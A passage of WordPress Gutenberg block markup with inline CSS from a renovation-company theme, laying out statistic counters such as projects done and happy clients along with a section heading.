2021\",\"nonces\":{\"update\":\"d4ddb6cf00\",\"delete\":\"098eea62dc\",\"edit\":\"9345bb08ba\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=23u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"fcd25d96-31cf-4465-9efa-36881a5ba21e\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-fcd25d96-31cf-4465-9efa-36881a5ba21e skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">541+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Projects Done</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"2a47d1fd-92e1-4c68-b763-70488f27ad66\"} -->\n<style type=\"text/css\"> .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2a47d1fd-92e1-4c68-b763-70488f27ad66 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2a47d1fd-92e1-4c68-b763-70488f27ad66\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":25,\"title\":\"project-img3\",\"filename\":\"project-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"166be17603\",\"delete\":\"fe3f8568d2\",\"edit\":\"ec62d06df5\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=25u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1929,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":67,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\",\"height\":67,\"width\":67,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":67,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"6aed668a-fb10-4525-96ac-4bc41b761fd7\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: 67px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6aed668a-fb10-4525-96ac-4bc41b761fd7 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">485+</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Happy Clients</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"blockId\":\"d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\"} -->\n<style type=\"text/css\"> .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d8d374c5-7d2c-4f67-bcbe-51d7c0a2e17d\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"id\":26,\"title\":\"project-img4\",\"filename\":\"project-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/project-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"eb6a446cde\",\"delete\":\"a8a00228e6\",\"edit\":\"ed515a959a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=26u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":1904,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":42,\"width\":42,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\",\"height\":42,\"width\":42,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":42,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: 42px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 0);padding:0;border-style:none;border-radius:0;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-0cd7514f-dd04-4b3b-b6e5-1f513b2e0f20 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:20px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/project-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h5 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:0\">Our</h5></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:400;margin-bottom:0\">Qualified Satff</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"42aff9bf-25ea-43ea-b807-8a8c00c85148\",\"topPadding\":100,\"topPaddingMobile\":60,\"topPaddingTablet\":80,\"bottomPadding\":0,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"backgroundImage\":\"https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg\",\"backgroundPosition\":\"center center\",\"backgroundType\":\"image\",\"className\":\"gb-renovation-section-6\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-6 skt-blocks-block-section-outer-wrap block-42aff9bf-25ea-43ea-b807-8a8c00c85148 background-type-image alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 60px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(https://cteisys.com/wp-content/uploads/2021/05/video-bg.jpg); background-position: center center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><style type=\"text/css\"> .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-42aff9bf-25ea-43ea-b807-8a8c00c85148 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-42aff9bf-25ea-43ea-b807-8a8c00c85148.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"67a82438-88af-4556-ac9e-4c3da247e0cf\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":64,\"subHeadingTitleFontSizeMobile\":34,\"subHeadingTitleFontSizeTablet\":50,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 64px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 50px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-67a82438-88af-4556-ac9e-4c3da247e0cf .responsive-heading-desc-text {\n font-size: 34px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 